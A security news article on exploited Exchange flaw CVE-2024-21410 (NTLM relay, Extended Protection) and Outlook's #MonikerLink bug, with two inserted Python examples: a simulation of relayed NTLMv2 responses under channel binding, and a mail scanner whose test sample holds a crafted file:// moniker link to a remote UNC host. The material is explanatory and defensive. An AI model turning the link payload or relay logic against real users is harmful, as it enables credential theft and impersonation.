
Microsoft Warns of Exploited Exchange Server Zero-Day

Microsoft says a newly patched Exchange Server vulnerability (CVE-2024-21410) has been exploited in attacks.

Microsoft warned on Wednesday that a newly addressed vulnerability in Exchange Server has been actively exploited in attacks.

Tracked as CVE-2024-21410 (CVSS score of 9.8), the critical-severity flaw is described as an elevation of privilege issue that enables NTLM relay attacks: the attacker does not obtain a reusable password hash, but forwards a live Net-NTLMv2 challenge response to the Exchange server.

According to Microsoft, an attacker could exploit the bug by relaying a user's leaked Net-NTLMv2 response (commonly called the Net-NTLMv2 hash) to a vulnerable server and authenticating as that user.

“An attacker could target an NTLM client such as Outlook with an NTLM credentials-leaking type vulnerability. The leaked credentials can then be relayed against the Exchange server to gain privileges as the victim client and to perform operations on the Exchange server on the victim’s behalf,” Microsoft explains in its advisory.

The root cause of the vulnerability, the tech giant notes, is that NTLM credential relay protection, or Extended Protection for Authentication (EPA), was not enabled by default in Exchange Server 2019. EPA binds the NTLM exchange to the TLS connection it travels over (channel binding), so a response that the client produced for a different endpoint, or for a cleartext connection, is rejected; without it, the Exchange virtual directories accept any correctly relayed NTLM authentication.

The issue has been addressed with the release of Exchange Server 2019 Cumulative Update 14 (CU14), which enables EPA by default and brings several other improvements and fixes as well. Administrators of earlier supported builds can enable EPA themselves with Microsoft's ExchangeExtendedProtectionManagement.ps1 script, which requires the August 2022 Security Update or later.
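To make the mechanism concrete, the following is an added illustration (not code from Microsoft, Exchange or this article) of a reduced NTLMv2 exchange with channel binding. It shows why a Net-NTLMv2 response coaxed out of an Outlook client over a cleartext or attacker-controlled TLS connection authenticates fine when EPA is off, is rejected when the server requires a matching binding, and cannot simply be patched by the relay because the binding sits inside the HMAC-protected blob. The NT hash, certificates, host names and the timestamp are constructed; the server check is cut down to proof verification and the binding comparison, and the three `token_checking` modes mirror the IIS extendedProtection tokenChecking values (None, Allow, Require).

```python
import hashlib
import hmac
import os
import struct

MSV_AV_EOL = 0x0000
MSV_AV_NB_COMPUTER_NAME = 0x0001
MSV_AV_NB_DOMAIN_NAME = 0x0002
MSV_AV_CHANNEL_BINDINGS = 0x000A
TEMP_AV_OFFSET = 28  # RespType..Reserved3 in the NTLMv2 "temp" blob precede the AV pairs


def ntowf_v2(nt_hash, user, domain):
    """ResponseKeyNT = HMAC_MD5(NT hash, UTF-16LE(UPPER(user) || domain))."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def channel_binding_hash(cert_der):
    """MsvAvChannelBindings: MD5 of a gss_channel_bindings_struct whose only populated
    field is application_data = "tls-server-end-point:" || SHA-256(certificate)."""
    app_data = b"tls-server-end-point:" + hashlib.sha256(cert_der).digest()
    return hashlib.md5(b"\x00" * 16 + struct.pack("<I", len(app_data)) + app_data).digest()


def encode_av_pairs(pairs):
    """Serialise (AvId, Value) tuples as AV_PAIR records, terminated by MsvAvEOL."""
    out = b"".join(struct.pack("<HH", av_id, len(v)) + v for av_id, v in pairs)
    return out + struct.pack("<HH", MSV_AV_EOL, 0)


def parse_av_pairs(blob):
    pairs, off = {}, 0
    while True:
        av_id, av_len = struct.unpack_from("<HH", blob, off)
        off += 4
        if av_id == MSV_AV_EOL:
            return pairs
        pairs[av_id] = blob[off:off + av_len]
        off += av_len


def client_response(nt_hash, user, domain, server_challenge, target_info, tls_cert):
    """NtChallengeResponse = NTProofStr || temp. The client binds the response to the
    TLS endpoint it is actually talking to; on a cleartext connection (tls_cert None)
    no MsvAvChannelBindings pair is added, which is what a coaxed client leaks."""
    extra = [] if tls_cert is None else [(MSV_AV_CHANNEL_BINDINGS, channel_binding_hash(tls_cert))]
    temp = (b"\x01\x01" + b"\x00" * 6                # RespType, HiRespType, Reserved1, Reserved2
            + struct.pack("<Q", 0x01DA5F2B6C8E2A00)  # timestamp (constructed constant)
            + os.urandom(8)                          # ChallengeFromClient
            + b"\x00" * 4                            # Reserved3
            + encode_av_pairs(target_info + extra)   # server's target info plus client pairs
            + b"\x00" * 4)                           # Reserved4
    proof = hmac.new(ntowf_v2(nt_hash, user, domain), server_challenge + temp, hashlib.md5).digest()
    return proof + temp


def server_verify(nt_hash, user, domain, server_challenge, response, server_cert, token_checking):
    """Server side. token_checking mirrors IIS extendedProtection tokenChecking:
    "None" ignores bindings, "Allow" checks one only if present, "Require" demands a match."""
    proof, temp = response[:16], response[16:]
    expected = hmac.new(ntowf_v2(nt_hash, user, domain), server_challenge + temp, hashlib.md5).digest()
    if not hmac.compare_digest(proof, expected):
        return False                                 # tampered temp or wrong credentials
    if token_checking == "None":
        return True
    cbt = parse_av_pairs(temp[TEMP_AV_OFFSET:]).get(MSV_AV_CHANNEL_BINDINGS)
    if cbt is None:
        return token_checking == "Allow"
    return hmac.compare_digest(cbt, channel_binding_hash(server_cert))


def splice_binding(response, cert):
    """What a relay would have to do to satisfy EPA: rewrite the AV pairs with the
    target's binding. NTProofStr is an HMAC over temp, so this breaks verification."""
    proof, temp = response[:16], response[16:]
    pairs = [(k, v) for k, v in parse_av_pairs(temp[TEMP_AV_OFFSET:]).items()
             if k != MSV_AV_CHANNEL_BINDINGS]
    pairs.append((MSV_AV_CHANNEL_BINDINGS, channel_binding_hash(cert)))
    return proof + temp[:TEMP_AV_OFFSET] + encode_av_pairs(pairs) + b"\x00" * 4


def relay_scenarios():
    """Run four cases under each tokenChecking mode; returns {case: {mode: accepted}}."""
    nt_hash = bytes.fromhex("a4f49c406510bdcab6824ee7c30fd852")   # constructed NT hash
    user, domain = "victim", "CORP"
    exchange_cert = b"constructed DER of the Exchange TLS certificate"
    attacker_cert = b"constructed DER of the attacker's TLS certificate"
    target_info = [(MSV_AV_NB_DOMAIN_NAME, domain.encode("utf-16-le")),
                   (MSV_AV_NB_COMPUTER_NAME, "EXCH01".encode("utf-16-le"))]
    challenge = os.urandom(8)   # Exchange's challenge, forwarded by the relay to the client
    responses = {
        "direct": client_response(nt_hash, user, domain, challenge, target_info, exchange_cert),
        "relay_cleartext": client_response(nt_hash, user, domain, challenge, target_info, None),
        "relay_attacker_tls": client_response(nt_hash, user, domain, challenge, target_info, attacker_cert),
    }
    responses["relay_spliced"] = splice_binding(responses["relay_cleartext"], exchange_cert)
    return {case: {mode: server_verify(nt_hash, user, domain, challenge, resp, exchange_cert, mode)
                   for mode in ("None", "Allow", "Require")}
            for case, resp in responses.items()}


if __name__ == "__main__":
    for case, outcome in relay_scenarios().items():
        print(f"{case:20s} {outcome}")
```

The table the script prints is the practical takeaway: a cleartext leak (no binding at all) still passes under "Allow", which is why the fix requires, rather than merely allows, channel binding on the Exchange virtual directories.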

Initially, Microsoft's advisory on CVE-2024-21410 did not flag the bug as exploited, but the company updated it on Wednesday to change the exploitation flag to "indicate that Microsoft was aware of exploitation of this vulnerability".

The tech giant has shared no details on the observed exploitation attempts. Last year, however, Microsoft attributed NTLM relay attacks exploiting an Outlook zero-day (CVE-2023-23397) to a Russia-based threat actor.


On Wednesday, cybersecurity firm Check Point published details on another critical-severity Outlook vulnerability, CVE-2024-21413 (CVSS score of 9.8). Resolved with the February 2024 Patch Tuesday updates, the bug allows attackers to bypass Office Protected View and execute code remotely.

The issue can be triggered using crafted hyperlinks that utilize the ‘file://’ protocol, “followed by a specific path, an exclamation mark, and additional arbitrary characters”, Check Point, which named the flaw #MonikerLink, explains.

“The #MonikerLink bug allows for a wide and serious impact, varying from leaking of local NTLM credential information to arbitrary code execution. This is due to the misuse of the Component Object Model (COM) on Windows, where Outlook incorrectly parses a specially crafted hyperlink to access COM objects,” Check Point says.

Attacks exploiting CVE-2024-21413 are trivial to carry out, trigger no security warnings or error messages, and can lead to data theft, malware execution, privilege escalation, and victim impersonation.
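A mail-gateway or incident-response check for the link shape Check Point describes (a file: target, then an exclamation mark, then further characters) can be written in a few lines. The scanner below is an added example, not Check Point's proof of concept or any Microsoft code; the email body it runs on is constructed, the UNC host uses a TEST-NET address, and the regular expressions are this example's own approximation of the pattern, so tune them against real traffic before relying on them.

```python
import re
from html.parser import HTMLParser

# file: scheme, a path with no "!" in it, then "!" and at least one more character.
# The "!" is what turns a plain file link into a moniker string that Outlook hands to COM.
MONIKER_LINK = re.compile(r"(?i)\bfile:(?://)?[^\s\"'<>!]+![^\s\"'<>]+")

# Extract the server name from UNC-style file links (file://host/..., file:///\\host\...,
# file:\\host\...). Local drive paths such as file:///C:/... deliberately do not match.
UNC_HOST = re.compile(r"(?i)^file:(?:///)?(?:\\\\|//)(?!\w:)([^\\/]+)")


class LinkCollector(HTMLParser):
    """Collect href targets from <a> and <area> tags in an HTML mail body."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag in ("a", "area"):
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)


def scan_html(html):
    """Return one finding per moniker-style file: link: the raw href, the file target
    before the "!", and the UNC host the client would authenticate to (None if local)."""
    parser = LinkCollector()
    parser.feed(html)
    findings = []
    for href in parser.links:
        if not MONIKER_LINK.search(href):
            continue
        host = UNC_HOST.match(href)
        findings.append({
            "href": href,
            "target": href.split("!", 1)[0],
            "unc_host": host.group(1) if host else None,
        })
    return findings


# Constructed sample: one ordinary link, one file: link without "!", one moniker link.
SAMPLE_EMAIL_HTML = """
<html><body>
<p>Quarterly figures are <a href="https://example.com/reports/q4!final">here</a>.</p>
<p>Template on the file server: <a href="file://fileserver/docs/readme.txt">readme</a></p>
<p>Please review <a href="file:///\\\\203.0.113.7\\share\\test.rtf!something">the draft</a>.</p>
</body></html>
"""


if __name__ == "__main__":
    for f in scan_html(SAMPLE_EMAIL_HTML):
        print(f"suspicious link -> {f['target']}  (UNC host: {f['unc_host']})")
```

A remote `unc_host` in a finding is the case to escalate: opening that link makes the client reach out over SMB to the named host, which is the credential-leak half of the attack chain, before any COM parsing of the moniker takes place.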

“Both individual users and organizations are urged to apply any patches or security updates provided by Microsoft, to follow recommended security practices, and to remain vigilant against suspicious hyperlinks and emails,” Check Point notes.

Related: Outlook Plays Attacker Tunes: Vulnerability Chain Leading to Zero-Click RCE

Related: New NTLM Hash Leak Attacks Target Outlook, Windows Programs

Related: Russian APT Used Zero-Click Outlook Exploit

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
